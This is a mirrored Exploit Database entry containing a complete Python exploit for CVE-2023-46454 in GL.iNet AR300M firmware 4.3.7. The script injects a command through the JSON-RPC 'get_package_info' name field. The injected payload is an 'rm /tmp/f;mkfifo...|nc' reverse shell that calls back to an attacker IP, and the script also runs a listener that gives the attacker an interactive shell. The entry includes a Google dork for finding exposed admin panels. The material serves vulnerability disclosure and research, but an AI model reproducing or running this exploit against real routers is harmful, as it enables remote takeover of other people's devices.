GL.iNet AR300M v4.3.7 Remote Code Execution – CVE-2023-46454 Exploit

• Exploit Database
• 63 阅读

• 作者： cyberaz0r
  日期： 2024-03-03
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51852/

• #!/usr/bin/env python3
  
  # Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
  # Google Dork: intitle:"GL.iNet Admin Panel"
  # Date: XX/11/2023
  # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
  # Vendor Homepage: https://www.gli-net.com
  # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
  # Version: 4.3.7
  # Tested on: GL.iNet AR300M
  # CVE: CVE-2023-46454
  
  import socket
  import requests
  import readline
  from time import sleep
  from random import randint
  from sys import stdout, argv
  from threading import Thread
  
  requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
  
  def trigger_revshell(url, auth_token, payload):
  	sleep(0.25)
  	data = {
  		'jsonrpc': '2.0',
  		'id': randint(1000, 9999),
  		'method': 'call',
  		'params': [
  			auth_token,
  			'plugins',
  			'get_package_info',
  			{'name': 'bas{}e-files'.format(payload)}
  		]
  	}
  	requests.post(url, json=data, verify=False)
  
  def get_command_response(s):
  	res = ''
  	while True:
  		try:
  			resp = s.recv(1).decode('utf-8')
  			res += resp
  		except UnicodeDecodeError:
  			pass
  		except socket.timeout:
  			break
  	return res
  
  def revshell_listen(revshell_ip, revshell_port):
  	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  	s.settimeout(5)
  
  	try:
  		s.bind((revshell_ip, int(revshell_port)))
  		s.listen(1)
  	except Exception as e:
  		print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
  		exit(1)
  
  	try:
  		clsock, claddr = s.accept()
  		clsock.settimeout(2)
  		if clsock:
  			print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
  			res = ''
  			while True:
  				command = input('$ ')
  				clsock.sendall('{}\n'.format(command).encode('utf-8'))
  				stdout.write(get_command_response(clsock))
  
  	except socket.timeout:
  		print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
  		s.close()
  
  	except KeyboardInterrupt:
  		print('\n[*] Closing connection')
  		try:
  			clsock.close()
  		except socket.error:
  			pass
  		except NameError:
  			pass
  		s.close()
  
  def main(base_url, auth_token, revshell_ip, revshell_port):
  	print('[+] Started GL.iNet <= 4.3.7 RCE exploit')
  
  	payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
  	print('[+] Reverse shell payload: "{}"'.format(payload))
  
  	print('[*] Triggering reverse shell connection')
  	Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()
  
  	print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
  	revshell_listen(revshell_ip, revshell_port)
  
  	print('[+] Done')
  
  if __name__ == '__main__':
  	if len(argv) < 5:
  		print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
  		exit(1)
  
  	main(argv[1], argv[2], argv[3], argv[4])